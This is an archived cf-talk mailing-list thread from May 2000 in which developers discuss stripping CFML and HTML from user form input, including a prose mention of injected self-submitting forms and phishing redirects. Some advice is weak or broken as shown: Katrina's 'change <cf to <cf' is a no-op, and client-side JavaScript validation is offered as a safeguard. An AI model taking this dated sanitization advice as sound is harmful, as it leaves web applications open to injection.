The easy way out, HTMLCodeformat() before you insert into the DB. This will
replace all special characters with their entity refs (< etc..).
Yes there is a reason to prohibit some html tags. What if a malicious user
inserts the HTML/JS for a self submitting form? Or a la an old Hotmail hack,
they insert a simple JavaScript redirect to a spoofed site that asks the
user to provide personal information.....
You could allow them to use a few of your own proprietary tags. UBB does
this. Say you only want to allow <p> you can tell the user to insert a
paragraph break, use [[p]] and strip out everything else. look for a
customTag if you are going to try and remove all HTML code though, it can
get very tricky (the regExes).
-S
___________________________________________
Sean Brown <[EMAIL PROTECTED]>
http://www.westcar.com/
"Either way you get your dog back"
-Anonymous
___________________________________________
-----Original Message-----
From: Todd Ashworth [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 09, 2000 2:03 PM
To: [EMAIL PROTECTED]
Subject: Re: CFML be gone!
Wouldn't that show up in the text though? Also, when the text is dumped to
the page, wouldn't the </cf ... > without a <cf ... > throw an error? Of
course, I guess that's what they get for not following instructions anyway.
.Todd
----- Original Message -----
From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, May 09, 2000 12:02 PM
Subject: Re: CFML be gone!
|
| You can do a search on <cf and change it to <cf
|
| That should get rid of any CF code they may try to submit.
|
| --Katrina
|
| ====================
| Katrina Chapman
| Consultant
| Ameriquest Mortgage
|
|
|
| "David
| Berger" To: [EMAIL PROTECTED]
| <djb194@hotma cc:
| il.com> Subject: Re: CFML be gone!
|
| 05/09/00
| 07:45 AM
| Please
| respond to
| cf-talk
|
|
|
|
|
| You can right your own custom form validation with javascript. Nothing
| good
| comes easy!
|
| ________________________________________________________________________
| Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
|
| --------------------------------------------------------------------------
----
|
| Archives: http://www.eGroups.com/list/cf-talk
| To Unsubscribe visit
| http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
| send a message to [EMAIL PROTECTED] with 'unsubscribe' in
| the body.
|
|
|
|
| --------------------------------------------------------------------------
----
| Archives: http://www.eGroups.com/list/cf-talk
| To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.
|
----------------------------------------------------------------------------
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.
------------------------------------------------------------------------------
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.
